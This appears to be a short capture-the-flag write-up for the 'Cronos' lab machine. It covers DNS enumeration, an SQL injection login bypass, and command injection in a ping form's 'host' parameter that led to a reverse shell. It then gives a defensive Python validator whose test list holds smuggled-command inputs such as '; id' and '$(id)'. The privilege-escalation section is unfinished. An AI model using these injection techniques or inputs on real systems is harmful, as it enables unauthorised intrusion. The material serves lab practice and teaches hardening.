cronos

Recon & Enumeration

port scan

22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

DNS resolve

I used nslookup (interactive) and got the domain "ns1.cronos.htb", so its parent domain must be "cronos.htb". Then I used the host command to get all the subdomains:

cronos.htb
ns1.cronos.htb
www.cronos.htb
admin.cronos.htb

https://10.10.10.13

Basic Apache web page, no use.

cronos.htb

It's a working domain, but no functionality.

admin.cronos.htb

login page

shell as www-data

Login form. I tried default creds, but failed. Then I tried SQL injection to bypass authentication and succeeded.

Inside the page, there is functionality through which we can traceroute or ping any IP. I intercepted the request in Burp and tried to get a reverse shell by command injection, but I failed and failed again. This is because I was injecting only in the first parameter "command". Then I injected in the 2nd parameter "host" and got the reverse shell.
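
How a ping/traceroute handler like the one described above can be hardened, as an added example (not code from this writeup or from the target application): both request parameters, "command" and "host", are validated, because checking only one leaves the other injectable. The function names, the allowlist, the IPv4-only rule and the sample requests are assumptions constructed for illustration.

```python
import ipaddress

# Hypothetical allowlist: form value -> fixed argv prefix.
# The executable and its flags never come from the request.
ALLOWED_COMMANDS = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute"],
}


def build_argv(command: str, host: str) -> list:
    """Return an argv list for subprocess.run(argv, shell=False).

    Raises ValueError if either parameter fails validation.
    """
    prefix = ALLOWED_COMMANDS.get(command)
    if prefix is None:
        raise ValueError(f"command not allowed: {command!r}")
    try:
        # Assumption: the tool only needs IPv4 targets. Parsing rejects shell
        # metacharacters and option-like values such as "-f" in one step.
        addr = ipaddress.IPv4Address(host)
    except ValueError:
        raise ValueError(f"host is not an IPv4 address: {host!r}") from None
    # A list argv with no shell means no string is ever re-parsed as syntax.
    return prefix + [str(addr)]


def check(command: str, host: str):
    """Return the argv list for a valid request, or None if it is rejected."""
    try:
        return build_argv(command, host)
    except ValueError:
        return None


# Constructed sample requests: (command, host)
SAMPLES = [
    ("ping", "10.10.10.13"),
    ("traceroute", "10.10.10.13"),
    ("ping", "10.10.10.13; id"),   # metacharacters in the 2nd parameter
    ("ping; id", "10.10.10.13"),   # metacharacters in the 1st parameter
    ("ping", "$(id)"),
    ("ping", "-f"),                # option injection without any metacharacter
]

if __name__ == "__main__":
    for cmd, host in SAMPLES:
        print(f"{cmd!r:14} {host!r:20} -> {check(cmd, host)}")
```
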

privesc www-data => guly

sds
